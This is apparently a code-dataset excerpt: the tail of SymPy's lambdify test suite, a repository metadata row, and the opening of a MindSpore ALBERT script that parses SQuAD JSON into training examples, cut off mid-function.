or_func_3 = lambdify((x, y, z), Or(x, y, z), modules="numpy")
not_func = lambdify((x), Not(x), modules="numpy")
arr1 = numpy.array([True, True])
arr2 = numpy.array([False, True])
arr3 = numpy.array([True, False])
numpy.testing.assert_array_equal(and_func(arr1, arr2), numpy.array([False, True]))
numpy.testing.assert_array_equal(and_func_3(arr1, arr2, arr3), numpy.array([False, False]))
numpy.testing.assert_array_equal(or_func(arr1, arr2), numpy.array([True, True]))
numpy.testing.assert_array_equal(or_func_3(arr1, arr2, arr3), numpy.array([True, True]))
numpy.testing.assert_array_equal(not_func(arr2), numpy.array([True, False]))
def test_numpy_matmul():
if not numpy:
skip("numpy not installed.")
xmat = Matrix([[x, y], [z, 1+z]])
ymat = Matrix([[x**2], [Abs(x)]])
mat_func = lambdify((x, y, z), xmat*ymat, modules="numpy")
numpy.testing.assert_array_equal(mat_func(0.5, 3, 4), numpy.array([[1.625], [3.5]]))
numpy.testing.assert_array_equal(mat_func(-0.5, 3, 4), numpy.array([[1.375], [3.5]]))
# Multiple matrices chained together in multiplication
f = lambdify((x, y, z), xmat*xmat*xmat, modules="numpy")
numpy.testing.assert_array_equal(f(0.5, 3, 4), numpy.array([[72.125, 119.25],
[159, 251]]))
def test_numpy_numexpr():
if not numpy:
skip("numpy not installed.")
if not numexpr:
skip("numexpr not installed.")
a, b, c = numpy.random.randn(3, 128, 128)
# ensure that numpy and numexpr return same value for complicated expression
expr = sin(x) + cos(y) + tan(z)**2 + Abs(z-y)*acos(sin(y*z)) + \
Abs(y-z)*acosh(2+exp(y-x))- sqrt(x**2+I*y**2)
npfunc = lambdify((x, y, z), expr, modules='numpy')
nefunc = lambdify((x, y, z), expr, modules='numexpr')
assert numpy.allclose(npfunc(a, b, c), nefunc(a, b, c))
def test_numexpr_userfunctions():
if not numpy:
skip("numpy not installed.")
if not numexpr:
skip("numexpr not installed.")
a, b = numpy.random.randn(2, 10)
uf = type('uf', (Function, ),
{'eval' : classmethod(lambda x, y : y**2+1)})
func = lambdify(x, 1-uf(x), modules='numexpr')
assert numpy.allclose(func(a), -(a**2))
uf = implemented_function(Function('uf'), lambda x, y : 2*x*y+1)
func = lambdify((x, y), uf(x, y), modules='numexpr')
assert numpy.allclose(func(a, b), 2*a*b+1)
def test_tensorflow_basic_math():
if not tensorflow:
skip("tensorflow not installed.")
expr = Max(sin(x), Abs(1/(x+2)))
func = lambdify(x, expr, modules="tensorflow")
with tensorflow.compat.v1.Session() as s:
a = tensorflow.constant(0, dtype=tensorflow.float32)
assert func(a).eval(session=s) == 0.5
def test_tensorflow_placeholders():
if not tensorflow:
skip("tensorflow not installed.")
expr = Max(sin(x), Abs(1/(x+2)))
func = lambdify(x, expr, modules="tensorflow")
with tensorflow.compat.v1.Session() as s:
a = tensorflow.compat.v1.placeholder(dtype=tensorflow.float32)
assert func(a).eval(session=s, feed_dict={a: 0}) == 0.5
def test_tensorflow_variables():
if not tensorflow:
skip("tensorflow not installed.")
expr = Max(sin(x), Abs(1/(x+2)))
func = lambdify(x, expr, modules="tensorflow")
with tensorflow.compat.v1.Session() as s:
a = tensorflow.Variable(0, dtype=tensorflow.float32)
s.run(a.initializer)
assert func(a).eval(session=s, feed_dict={a: 0}) == 0.5
def test_tensorflow_logical_operations():
if not tensorflow:
skip("tensorflow not installed.")
expr = Not(And(Or(x, y), y))
func = lambdify([x, y], expr, modules="tensorflow")
with tensorflow.compat.v1.Session() as s:
assert func(False, True).eval(session=s) == False
def test_tensorflow_piecewise():
if not tensorflow:
skip("tensorflow not installed.")
expr = Piecewise((0, Eq(x,0)), (-1, x < 0), (1, x > 0))
func = lambdify(x, expr, modules="tensorflow")
with tensorflow.compat.v1.Session() as s:
assert func(-1).eval(session=s) == -1
assert func(0).eval(session=s) == 0
assert func(1).eval(session=s) == 1
def test_tensorflow_multi_max():
if not tensorflow:
skip("tensorflow not installed.")
expr = Max(x, -x, x**2)
func = lambdify(x, expr, modules="tensorflow")
with tensorflow.compat.v1.Session() as s:
assert func(-2).eval(session=s) == 4
def test_tensorflow_multi_min():
if not tensorflow:
skip("tensorflow not installed.")
expr = Min(x, -x, x**2)
func = lambdify(x, expr, modules="tensorflow")
with tensorflow.compat.v1.Session() as s:
assert func(-2).eval(session=s) == -2
def test_tensorflow_relational():
if not tensorflow:
skip("tensorflow not installed.")
expr = x >= 0
func = lambdify(x, expr, modules="tensorflow")
with tensorflow.compat.v1.Session() as s:
assert func(1).eval(session=s) == True
def test_tensorflow_complexes():
if not tensorflow:
skip("tensorflow not installed")
func1 = lambdify(x, re(x), modules="tensorflow")
func2 = lambdify(x, im(x), modules="tensorflow")
func3 = lambdify(x, Abs(x), modules="tensorflow")
func4 = lambdify(x, arg(x), modules="tensorflow")
with tensorflow.compat.v1.Session() as s:
# For versions before
# https://github.com/tensorflow/tensorflow/issues/30029
# resolved, using python numeric types may not work
a = tensorflow.constant(1+2j)
assert func1(a).eval(session=s) == 1
assert func2(a).eval(session=s) == 2
tensorflow_result = func3(a).eval(session=s)
sympy_result = Abs(1 + 2j).evalf()
assert abs(tensorflow_result-sympy_result) < 10**-6
tensorflow_result = func4(a).eval(session=s)
sympy_result = arg(1 + 2j).evalf()
assert abs(tensorflow_result-sympy_result) < 10**-6
def test_tensorflow_array_arg():
# Test for issue 14655 (tensorflow part)
if not tensorflow:
skip("tensorflow not installed.")
f = lambdify([[x, y]], x*x + y, 'tensorflow')
with tensorflow.compat.v1.Session() as s:
fcall = f(tensorflow.constant([2.0, 1.0]))
assert fcall.eval(session=s) == 5.0
#================== Test symbolic ==================================
def test_sym_single_arg():
f = lambdify(x, x * y)
assert f(z) == z * y
def test_sym_list_args():
f = lambdify([x, y], x + y + z)
assert f(1, 2) == 3 + z
def test_sym_integral():
f = Lambda(x, exp(-x**2))
l = lambdify(x, Integral(f(x), (x, -oo, oo)), modules="sympy")
assert l(y) == Integral(exp(-y**2), (y, -oo, oo))
assert l(y).doit() == sqrt(pi)
def test_namespace_order():
# lambdify had a bug, such that module dictionaries or cached module
# dictionaries would pull earlier namespaces into themselves.
# Because the module dictionaries form the namespace of the
# generated lambda, this meant that the behavior of a previously
# generated lambda function could change as a result of later calls
# to lambdify.
n1 = {'f': lambda x: 'first f'}
n2 = {'f': lambda x: 'second f',
'g': lambda x: 'function g'}
f = sympy.Function('f')
g = sympy.Function('g')
if1 = lambdify(x, f(x), modules=(n1, "sympy"))
assert if1(1) == 'first f'
if2 = lambdify(x, g(x), modules=(n2, "sympy"))
# previously gave 'second f'
assert if1(1) == 'first f'
assert if2(1) == 'function g'
def test_namespace_type():
# lambdify had a bug where it would reject modules of type unicode
# on Python 2.
x = sympy.Symbol('x')
lambdify(x, x, modules='math')
def test_imps():
# Here we check if the default returned functions are anonymous - in
# the sense that we can have more than one function with the same name
f = implemented_function('f', lambda x: 2*x)
g = implemented_function('f', lambda x: math.sqrt(x))
l1 = lambdify(x, f(x))
l2 = lambdify(x, g(x))
assert str(f(x)) == str(g(x))
assert l1(3) == 6
assert l2(3) == math.sqrt(3)
# check that we can pass in a Function as input
func = sympy.Function('myfunc')
assert not hasattr(func, '_imp_')
my_f = implemented_function(func, lambda x: 2*x)
assert hasattr(my_f, '_imp_')
# Error for functions with same name and different implementation
f2 = implemented_function("f", lambda x: x + 101)
raises(ValueError, lambda: lambdify(x, f(f2(x))))
def test_imps_errors():
# Test errors that implemented functions can return, and still be able to
# form expressions.
# See: https://github.com/sympy/sympy/issues/10810
#
# XXX: Removed AttributeError here. This test was added due to issue 10810
# but that issue was about ValueError. It doesn't seem reasonable to
# "support" catching AttributeError in the same context...
for val, error_class in product((0, 0., 2, 2.0), (TypeError, ValueError)):
def myfunc(a):
if a == 0:
raise error_class
return 1
f = implemented_function('f', myfunc)
expr = f(val)
assert expr == f(val)
def test_imps_wrong_args():
raises(ValueError, lambda: implemented_function(sin, lambda x: x))
def test_lambdify_imps():
# Test lambdify with implemented functions
# first test basic (sympy) lambdify
f = sympy.cos
assert lambdify(x, f(x))(0) == 1
assert lambdify(x, 1 + f(x))(0) == 2
assert lambdify((x, y), y + f(x))(0, 1) == 2
# make an implemented function and test
f = implemented_function("f", lambda x: x + 100)
assert lambdify(x, f(x))(0) == 100
assert lambdify(x, 1 + f(x))(0) == 101
assert lambdify((x, y), y + f(x))(0, 1) == 101
# Can also handle tuples, lists, dicts as expressions
lam = lambdify(x, (f(x), x))
assert lam(3) == (103, 3)
lam = lambdify(x, [f(x), x])
assert lam(3) == [103, 3]
lam = lambdify(x, [f(x), (f(x), x)])
assert lam(3) == [103, (103, 3)]
lam = lambdify(x, {f(x): x})
assert lam(3) == {103: 3}
lam = lambdify(x, {f(x): x})
assert lam(3) == {103: 3}
lam = lambdify(x, {x: f(x)})
assert lam(3) == {3: 103}
# Check that imp preferred to other namespaces by default
d = {'f': lambda x: x + 99}
lam = lambdify(x, f(x), d)
assert lam(3) == 103
# Unless flag passed
lam = lambdify(x, f(x), d, use_imps=False)
assert lam(3) == 102
def test_dummification():
t = symbols('t')
F = Function('F')
G = Function('G')
#"\alpha" is not a valid python variable name
#lambdify should sub in a dummy for it, and return
#without a syntax error
alpha = symbols(r'\alpha')
some_expr = 2 * F(t)**2 / G(t)
lam = lambdify((F(t), G(t)), some_expr)
assert lam(3, 9) == 2
lam = lambdify(sin(t), 2 * sin(t)**2)
assert lam(F(t)) == 2 * F(t)**2
#Test that \alpha was properly dummified
lam = lambdify((alpha, t), 2*alpha + t)
assert lam(2, 1) == 5
raises(SyntaxError, lambda: lambdify(F(t) * G(t), F(t) * G(t) + 5))
raises(SyntaxError, lambda: lambdify(2 * F(t), 2 * F(t) + 5))
raises(SyntaxError, lambda: lambdify(2 * F(t), 4 * F(t) + 5))
def test_curly_matrix_symbol():
# Issue #15009
curlyv = sympy.MatrixSymbol("{v}", 2, 1)
lam = lambdify(curlyv, curlyv)
assert lam(1)==1
lam = lambdify(curlyv, curlyv, dummify=True)
assert lam(1)==1
def test_python_keywords():
# Test for issue 7452. The automatic dummification should ensure use of
# Python reserved keywords as symbol names will create valid lambda
# functions. This is an additional regression test.
python_if = symbols('if')
expr = python_if / 2
f = lambdify(python_if, expr)
assert f(4.0) == 2.0
def test_lambdify_docstring():
func = lambdify((w, x, y, z), w + x + y + z)
ref = (
"Created with lambdify. Signature:\n\n"
"func(w, x, y, z)\n\n"
"Expression:\n\n"
"w + x + y + z"
).splitlines()
assert func.__doc__.splitlines()[:len(ref)] == ref
syms = symbols('a1:26')
func = lambdify(syms, sum(syms))
ref = (
"Created with lambdify. Signature:\n\n"
"func(a1, a2, a3, a4, a5, a6, a7, a8, a9, a10, a11, a12, a13, a14, a15,\n"
" a16, a17, a18, a19, a20, a21, a22, a23, a24, a25)\n\n"
"Expression:\n\n"
"a1 + a10 + a11 + a12 + a13 + a14 + a15 + a16 + a17 + a18 + a19 + a2 + a20 +..."
).splitlines()
assert func.__doc__.splitlines()[:len(ref)] == ref
#================== Test special printers ==========================
def test_special_printers():
from sympy.polys.numberfields import IntervalPrinter
def intervalrepr(expr):
return IntervalPrinter().doprint(expr)
expr = sqrt(sqrt(2) + sqrt(3)) + S.Half
func0 = lambdify((), expr, modules="mpmath", printer=intervalrepr)
func1 = lambdify((), expr, modules="mpmath", printer=IntervalPrinter)
func2 = lambdify((), expr, modules="mpmath", printer=IntervalPrinter())
mpi = type(mpmath.mpi(1, 2))
assert isinstance(func0(), mpi)
assert isinstance(func1(), mpi)
assert isinstance(func2(), mpi)
# To check Is lambdify loggamma works for mpmath or not
exp1 = lambdify(x, loggamma(x), 'mpmath')(5)
exp2 = lambdify(x, loggamma(x), 'mpmath')(1.8)
exp3 = lambdify(x, loggamma(x), 'mpmath')(15)
exp_ls = [exp1, exp2, exp3]
sol1 = mpmath.loggamma(5)
sol2 = mpmath.loggamma(1.8)
sol3 = mpmath.loggamma(15)
sol_ls = [sol1, sol2, sol3]
assert exp_ls == sol_ls
def test_true_false():
# We want exact is comparison here, not just ==
assert lambdify([], true)() is True
assert lambdify([], false)() is False
def test_issue_2790():
assert lambdify((x, (y, z)), x + y)(1, (2, 4)) == 3
assert lambdify((x, (y, (w, z))), w + x + y + z)(1, (2, (3, 4))) == 10
assert lambdify(x, x + 1, dummify=False)(1) == 2
def test_issue_12092():
f = implemented_function('f', lambda x: x**2)
assert f(f(2)).evalf() == Float(16)
def test_issue_14911():
class Variable(sympy.Symbol):
def _sympystr(self, printer):
return printer.doprint(self.name)
_lambdacode = _sympystr
_numpycode = _sympystr
x = Variable('x')
y = 2 * x
code = LambdaPrinter().doprint(y)
assert code.replace(' ', '') == '2*x'
def test_ITE():
assert lambdify((x, y, z), ITE(x, y, z))(True, 5, 3) == 5
assert lambdify((x, y, z), ITE(x, y, z))(False, 5, 3) == 3
def test_Min_Max():
# see gh-10375
assert lambdify((x, y, z), Min(x, y, z))(1, 2, 3) == 1
assert lambdify((x, y, z), Max(x, y, z))(1, 2, 3) == 3
def test_Indexed():
# Issue #10934
if not numpy:
skip("numpy not installed")
a = IndexedBase('a')
i, j = symbols('i j')
b = numpy.array([[1, 2], [3, 4]])
assert lambdify(a, Sum(a[x, y], (x, 0, 1), (y, 0, 1)))(b) == 10
def test_issue_12173():
#test for issue 12173
expr1 = lambdify((x, y), uppergamma(x, y),"mpmath")(1, 2)
expr2 = lambdify((x, y), lowergamma(x, y),"mpmath")(1, 2)
assert expr1 == uppergamma(1, 2).evalf()
assert expr2 == lowergamma(1, 2).evalf()
def test_issue_13642():
if not numpy:
skip("numpy not installed")
f = lambdify(x, sinc(x))
assert Abs(f(1) - sinc(1)).n() < 1e-15
def test_sinc_mpmath():
f = lambdify(x, sinc(x), "mpmath")
assert Abs(f(1) - sinc(1)).n() < 1e-15
def test_lambdify_dummy_arg():
d1 = Dummy()
f1 = lambdify(d1, d1 + 1, dummify=False)
assert f1(2) == 3
f1b = lambdify(d1, d1 + 1)
assert f1b(2) == 3
d2 = Dummy('x')
f2 = lambdify(d2, d2 + 1)
assert f2(2) == 3
f3 = lambdify([[d2]], d2 + 1)
assert f3([2]) == 3
def test_lambdify_mixed_symbol_dummy_args():
d = Dummy()
# Contrived example of name clash
dsym = symbols(str(d))
f = lambdify([d, dsym], d - dsym)
assert f(4, 1) == 3
def test_numpy_array_arg():
# Test for issue 14655 (numpy part)
if not numpy:
skip("numpy not installed")
f = lambdify([[x, y]], x*x + y, 'numpy')
assert f(numpy.array([2.0, 1.0])) == 5
def test_scipy_fns():
if not scipy:
skip("scipy not installed")
single_arg_sympy_fns = [erf, erfc, factorial, gamma, loggamma, digamma]
single_arg_scipy_fns = [scipy.special.erf, scipy.special.erfc,
scipy.special.factorial, scipy.special.gamma, scipy.special.gammaln,
scipy.special.psi]
numpy.random.seed(0)
for (sympy_fn, scipy_fn) in zip(single_arg_sympy_fns, single_arg_scipy_fns):
f = lambdify(x, sympy_fn(x), modules="scipy")
for i in range(20):
tv = numpy.random.uniform(-10, 10) + 1j*numpy.random.uniform(-5, 5)
# SciPy thinks that factorial(z) is 0 when re(z) < 0 and
# does not support complex numbers.
# SymPy does not think so.
if sympy_fn == factorial:
tv = numpy.abs(tv)
# SciPy supports gammaln for real arguments only,
# and there is also a branch cut along the negative real axis
if sympy_fn == loggamma:
tv = numpy.abs(tv)
# SymPy's digamma evaluates as polygamma(0, z)
# which SciPy supports for real arguments only
if sympy_fn == digamma:
tv = numpy.real(tv)
sympy_result = sympy_fn(tv).evalf()
assert abs(f(tv) - sympy_result) < 1e-13*(1 + abs(sympy_result))
assert abs(f(tv) - scipy_fn(tv)) < 1e-13*(1 + abs(sympy_result))
double_arg_sympy_fns = [RisingFactorial, besselj, bessely, besseli,
besselk]
double_arg_scipy_fns = [scipy.special.poch, scipy.special.jv,
scipy.special.yv, scipy.special.iv, scipy.special.kv]
for (sympy_fn, scipy_fn) in zip(double_arg_sympy_fns, double_arg_scipy_fns):
f = lambdify((x, y), sympy_fn(x, y), modules="scipy")
for i in range(20):
# SciPy supports only real orders of Bessel functions
tv1 = numpy.random.uniform(-10, 10)
tv2 = numpy.random.uniform(-10, 10) + 1j*numpy.random.uniform(-5, 5)
# SciPy supports poch for real arguments only
if sympy_fn == RisingFactorial:
tv2 = numpy.real(tv2)
sympy_result = sympy_fn(tv1, tv2).evalf()
assert abs(f(tv1, tv2) - sympy_result) < 1e-13*(1 + abs(sympy_result))
assert abs(f(tv1, tv2) - scipy_fn(tv1, tv2)) < 1e-13*(1 + abs(sympy_result))
def test_scipy_polys():
if not scipy:
skip("scipy not installed")
numpy.random.seed(0)
params = symbols('n k a b')
# list polynomials with the number of parameters
polys = [
(chebyshevt, 1),
(chebyshevu, 1),
(legendre, 1),
(hermite, 1),
(laguerre, 1),
(gegenbauer, 2),
(assoc_legendre, 2),
(assoc_laguerre, 2),
(jacobi, 3)
]
msg = \
"The random test of the function {func} with the arguments " \
"{args} had failed because the SymPy result {sympy_result} " \
"and SciPy result {scipy_result} had failed to converge " \
"within the tolerance {tol} " \
"(Actual absolute difference : {diff})"
for sympy_fn, num_params in polys:
args = params[:num_params] + (x,)
f = lambdify(args, sympy_fn(*args))
for _ in range(10):
tn = numpy.random.randint(3, 10)
tparams = tuple(numpy.random.uniform(0, 5, size=num_params-1))
tv = numpy.random.uniform(-10, 10) + 1j*numpy.random.uniform(-5, 5)
# SciPy supports hermite for real arguments only
if sympy_fn == hermite:
tv = numpy.real(tv)
# assoc_legendre needs x in (-1, 1) and integer param at most n
if sympy_fn == assoc_legendre:
tv = numpy.random.uniform(-1, 1)
tparams = tuple(numpy.random.randint(1, tn, size=1))
vals = (tn,) + tparams + (tv,)
scipy_result = f(*vals)
sympy_result = sympy_fn(*vals).evalf()
atol = 1e-9*(1 + abs(sympy_result))
diff = abs(scipy_result - sympy_result)
try:
assert diff < atol
except TypeError:
raise AssertionError(
msg.format(
func=repr(sympy_fn),
args=repr(vals),
sympy_result=repr(sympy_result),
scipy_result=repr(scipy_result),
diff=diff,
tol=atol)
)
def test_lambdify_inspect():
f = lambdify(x, x**2)
# Test that inspect.getsource works but don't hard-code implementation
# details
assert 'x**2' in inspect.getsource(f)
def test_issue_14941():
x, y = Dummy(), Dummy()
# test dict
f1 = lambdify([x, y], {x: 3, y: 3}, 'sympy')
assert f1(2, 3) == {2: 3, 3: 3}
# test tuple
f2 = lambdify([x, y], (y, x), 'sympy')
assert f2(2, 3) == (3, 2)
# test list
f3 = lambdify([x, y], [y, x], 'sympy')
assert f3(2, 3) == [3, 2]
def test_lambdify_Derivative_arg_issue_16468():
f = Function('f')(x)
fx = f.diff()
assert lambdify((f, fx), f + fx)(10, 5) == 15
assert eval(lambdastr((f, fx), f/fx))(10, 5) == 2
raises(SyntaxError, lambda:
eval(lambdastr((f, fx), f/fx, dummify=False)))
assert eval(lambdastr((f, fx), f/fx, dummify=True))(10, 5) == 2
assert eval(lambdastr((fx, f), f/fx, dummify=True))(S(10), 5) == S.Half
assert lambdify(fx, 1 + fx)(41) == 42
assert eval(lambdastr(fx, 1 + fx, dummify=True))(41) == 42
def test_imag_real():
f_re = lambdify([z], sympy.re(z))
val = 3+2j
assert f_re(val) == val.real
f_im = lambdify([z], sympy.im(z)) # see #15400
assert f_im(val) == val.imag
def test_MatrixSymbol_issue_15578():
if not numpy:
skip("numpy not installed")
A = MatrixSymbol('A', 2, 2)
A0 = numpy.array([[1, 2], [3, 4]])
f = lambdify(A, A**(-1))
assert numpy.allclose(f(A0), numpy.array([[-2., 1.], [1.5, -0.5]]))
g = lambdify(A, A**3)
assert numpy.allclose(g(A0), numpy.array([[37, 54], [81, 118]]))
def test_issue_15654():
if not scipy:
skip("scipy not installed")
from sympy.abc import n, l, r, Z
from sympy.physics import hydrogen
nv, lv, rv, Zv = 1, 0, 3, 1
sympy_value = hydrogen.R_nl(nv, lv, rv, Zv).evalf()
f = lambdify((n, l, r, Z), hydrogen.R_nl(n, l, r, Z))
scipy_value = f(nv, lv, rv, Zv)
assert abs(sympy_value - scipy_value) < 1e-15
def test_issue_15827():
if not numpy:
skip("numpy not installed")
A = MatrixSymbol("A", 3, 3)
B = MatrixSymbol("B", 2, 3)
C = MatrixSymbol("C", 3, 4)
D = MatrixSymbol("D", 4, 5)
k=symbols("k")
f = lambdify(A, (2*k)*A)
g = lambdify(A, (2+k)*A)
h = lambdify(A, 2*A)
i = lambdify((B, C, D), 2*B*C*D)
assert numpy.array_equal(f(numpy.array([[1, 2, 3], [1, 2, 3], [1, 2, 3]])), \
numpy.array([[2*k, 4*k, 6*k], [2*k, 4*k, 6*k], [2*k, 4*k, 6*k]], dtype=object))
assert numpy.array_equal(g(numpy.array([[1, 2, 3], [1, 2, 3], [1, 2, 3]])), \
numpy.array([[k + 2, 2*k + 4, 3*k + 6], [k + 2, 2*k + 4, 3*k + 6], \
[k + 2, 2*k + 4, 3*k + 6]], dtype=object))
assert numpy.array_equal(h(numpy.array([[1, 2, 3], [1, 2, 3], [1, 2, 3]])), \
numpy.array([[2, 4, 6], [2, 4, 6], [2, 4, 6]]))
assert numpy.array_equal(i(numpy.array([[1, 2, 3], [1, 2, 3]]), numpy.array([[1, 2, 3, 4], [1, 2, 3, 4], [1, 2, 3, 4]]), \
numpy.array([[1, 2, 3, 4, 5], [1, 2, 3, 4, 5], [1, 2, 3, 4, 5], [1, 2, 3, 4, 5]])), numpy.array([[ 120, 240, 360, 480, 600], \
[ 120, 240, 360, 480, 600]]))
def test_issue_16930():
if not scipy:
skip("scipy not installed")
x = symbols("x")
f = lambda x: S.GoldenRatio * x**2
f_ = lambdify(x, f(x), modules='scipy')
assert f_(1) == scipy.constants.golden_ratio
def test_issue_17898():
if not scipy:
skip("scipy not installed")
x = symbols("x")
f_ = lambdify([x], sympy.LambertW(x,-1), modules='scipy')
assert f_(0.1) == mpmath.lambertw(0.1, -1)
def test_issue_13167_21411():
if not numpy:
skip("numpy not installed")
f1 = lambdify(x, sympy.Heaviside(x))
f2 = lambdify(x, sympy.Heaviside(x, 1))
res1 = f1([-1, 0, 1])
res2 = f2([-1, 0, 1])
assert Abs(res1[0]).n() < 1e-15 # First functionality: only one argument passed
assert Abs(res1[1] - 1/2).n() < 1e-15
assert Abs(res1[2] - 1).n() < 1e-15
assert Abs(res2[0]).n() < 1e-15 # Second functionality: two arguments passed
assert Abs(res2[1] - 1).n() < 1e-15
assert Abs(res2[2] - 1).n() < 1e-15
def test_single_e():
f = lambdify(x, E)
assert f(23) == exp(1.0)
def test_issue_16536():
if not scipy:
skip("scipy not installed")
a = symbols('a')
f1 = lowergamma(a, x)
F = lambdify((a, x), f1, modules='scipy')
assert abs(lowergamma(1, 3) - F(1, 3)) <= 1e-10
f2 = uppergamma(a, x)
F = lambdify((a, x), f2, modules='scipy')
assert abs(uppergamma(1, 3) - F(1, 3)) <= 1e-10
def test_fresnel_integrals_scipy():
if not scipy:
skip("scipy not installed")
f1 = fresnelc(x)
f2 = fresnels(x)
F1 = lambdify(x, f1, modules='scipy')
F2 = lambdify(x, f2, modules='scipy')
assert abs(fresnelc(1.3) - F1(1.3)) <= 1e-10
assert abs(fresnels(1.3) - F2(1.3)) <= 1e-10
def test_beta_scipy():
if not scipy:
skip("scipy not installed")
f = beta(x, y)
F = lambdify((x, y), f, modules='scipy')
assert abs(beta(1.3, 2.3) - F(1.3, 2.3)) <= 1e-10
def test_beta_math():
f = beta(x, y)
F = lambdify((x, y), f, modules='math')
assert abs(beta(1.3, 2.3) - F(1.3, 2.3)) <= 1e-10
def test_betainc_scipy():
if not scipy:
skip("scipy not installed")
f = betainc(w, x, y, z)
F = lambdify((w, x, y, z), f, modules='scipy')
assert abs(betainc(1.4, 3.1, 0.1, 0.5) - F(1.4, 3.1, 0.1, 0.5)) <= 1e-10
def test_betainc_regularized_scipy():
if not scipy:
skip("scipy not installed")
f = betainc_regularized(w, x, y, z)
F = lambdify((w, x, y, z), f, modules='scipy')
assert abs(betainc_regularized(0.2, 3.5, 0.1, 1) - F(0.2, 3.5, 0.1, 1)) <= 1e-10
def test_numpy_special_math():
if not numpy:
skip("numpy not installed")
funcs = [expm1, log1p, exp2, log2, log10, hypot, logaddexp, logaddexp2]
for func in funcs:
if 2 in func.nargs:
expr = func(x, y)
args = (x, y)
num_args = (0.3, 0.4)
elif 1 in func.nargs:
expr = func(x)
args = (x,)
num_args = (0.3,)
else:
raise NotImplementedError("Need to handle other than unary & binary functions in test")
f = lambdify(args, expr)
result = f(*num_args)
reference = expr.subs(dict(zip(args, num_args))).evalf()
assert numpy.allclose(result, float(reference))
lae2 = lambdify((x, y), logaddexp2(log2(x), log2(y)))
assert abs(2.0**lae2(1e-50, 2.5e-50) - 3.5e-50) < 1e-62 # from NumPy's docstring
def test_scipy_special_math():
if not scipy:
skip("scipy not installed")
cm1 = lambdify((x,), cosm1(x), modules='scipy')
assert abs(cm1(1e-20) + 5e-41) < 1e-200
def test_cupy_array_arg():
if not cupy:
skip("CuPy not installed")
f = lambdify([[x, y]], x*x + y, 'cupy')
result = f(cupy.array([2.0, 1.0]))
assert result == 5
assert "cupy" in str(type(result))
def test_cupy_array_arg_using_numpy():
# numpy functions can be run on cupy arrays
# unclear if we can "officialy" support this,
# depends on numpy __array_function__ support
if not cupy:
skip("CuPy not installed")
f = lambdify([[x, y]], x*x + y, 'numpy')
result = f(cupy.array([2.0, 1.0]))
assert result == 5
assert "cupy" in str(type(result))
def test_cupy_dotproduct():
if not cupy:
skip("CuPy not installed")
A = Matrix([x, y, z])
f1 = lambdify([x, y, z], DotProduct(A, A), modules='cupy')
f2 = lambdify([x, y, z], DotProduct(A, A.T), modules='cupy')
f3 = lambdify([x, y, z], DotProduct(A.T, A), modules='cupy')
f4 = lambdify([x, y, z], DotProduct(A, A.T), modules='cupy')
assert f1(1, 2, 3) == \
f2(1, 2, 3) == \
f3(1, 2, 3) == \
f4(1, 2, 3) == \
cupy.array([14])
| 31.926899
| 130
| 0.588063
|
de4888d07625e7a318f4bb439819f8c978f615c6
| 12,530
|
py
|
Python
|
research/nlp/albert/src/create_squad_data.py
|
mindspore-ai/models
|
9127b128e2961fd698977e918861dadfad00a44c
|
[
"Apache-2.0"
] | 77
|
2021-10-15T08:32:37.000Z
|
2022-03-30T13:09:11.000Z
|
research/nlp/albert/src/create_squad_data.py
|
mindspore-ai/models
|
9127b128e2961fd698977e918861dadfad00a44c
|
[
"Apache-2.0"
] | 3
|
2021-10-30T14:44:57.000Z
|
2022-02-14T06:57:57.000Z
|
research/nlp/albert/src/create_squad_data.py
|
mindspore-ai/models
|
9127b128e2961fd698977e918861dadfad00a44c
|
[
"Apache-2.0"
] | 24
|
2021-10-15T08:32:45.000Z
|
2022-03-24T18:45:20.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""create squad data"""
import collections
import json
from src import tokenization
class SquadExample():
"""extract column contents from raw data"""
def __init__(self,
qas_id,
question_text,
doc_tokens,
orig_answer_text=None,
start_position=None,
end_position=None,
is_impossible=False):
self.qas_id = qas_id
self.question_text = question_text
self.doc_tokens = doc_tokens
self.orig_answer_text = orig_answer_text
self.start_position = start_position
self.end_position = end_position
self.is_impossible = is_impossible
class InputFeatures():
"""A single set of features of data."""
def __init__(self,
unique_id,
example_index,
doc_span_index,
tokens,
token_to_orig_map,
token_is_max_context,
input_ids,
input_mask,
segment_ids,
start_position=None,
end_position=None,
is_impossible=None):
self.unique_id = unique_id
self.example_index = example_index
self.doc_span_index = doc_span_index
self.tokens = tokens
self.token_to_orig_map = token_to_orig_map
self.token_is_max_context = token_is_max_context
self.input_ids = input_ids
self.input_mask = input_mask
self.segment_ids = segment_ids
self.start_position = start_position
self.end_position = end_position
self.is_impossible = is_impossible
def read_squad_examples(input_file, is_training, version_2_with_negative=False):
"""Return list of SquadExample from input_data or input_file (SQuAD json file)"""
with open(input_file, "r") as reader:
input_data = json.load(reader)["data"]
def is_whitespace(c):
if c == " " or c == "\t" or c == "\r" or c == "\n" or ord(c) == 0x202F:
return True
return False
def token_offset(text):
doc_tokens = []
char_to_word_offset = []
prev_is_whitespace = True
for c in paragraph_text:
if is_whitespace(c):
prev_is_whitespace = True
else:
if prev_is_whitespace:
doc_tokens.append(c)
else:
doc_tokens[-1] += c
prev_is_whitespace = False
char_to_word_offset.append(len(doc_tokens) - 1)
return (doc_tokens, char_to_word_offset)
def process_one_example(qa, is_training, version_2_with_negative, doc_tokens, char_to_word_offset):
qas_id = qa["id"]
question_text = qa["question"]
start_position = -1
end_position = -1
orig_answer_text = ""
is_impossible = False
if is_training:
if version_2_with_negative:
is_impossible = qa["is_impossible"]
if (len(qa["answers"]) != 1) and (not is_impossible):
raise ValueError("For training, each question should have exactly 1 answer.")
if not is_impossible:
answer = qa["answers"][0]
orig_answer_text = answer["text"]
answer_offset = answer["answer_start"]
answer_length = len(orig_answer_text)
start_position = char_to_word_offset[answer_offset]
end_position = char_to_word_offset[answer_offset + answer_length - 1]
actual_text = " ".join(doc_tokens[start_position:(end_position + 1)])
cleaned_answer_text = " ".join(tokenization.whitespace_tokenize(orig_answer_text))
if actual_text.find(cleaned_answer_text) == -1:
return None
example = SquadExample(
qas_id=qas_id,
question_text=question_text,
doc_tokens=doc_tokens,
orig_answer_text=orig_answer_text,
start_position=start_position,
end_position=end_position,
is_impossible=is_impossible)
return example
examples = []
for entry in input_data:
for paragraph in entry["paragraphs"]:
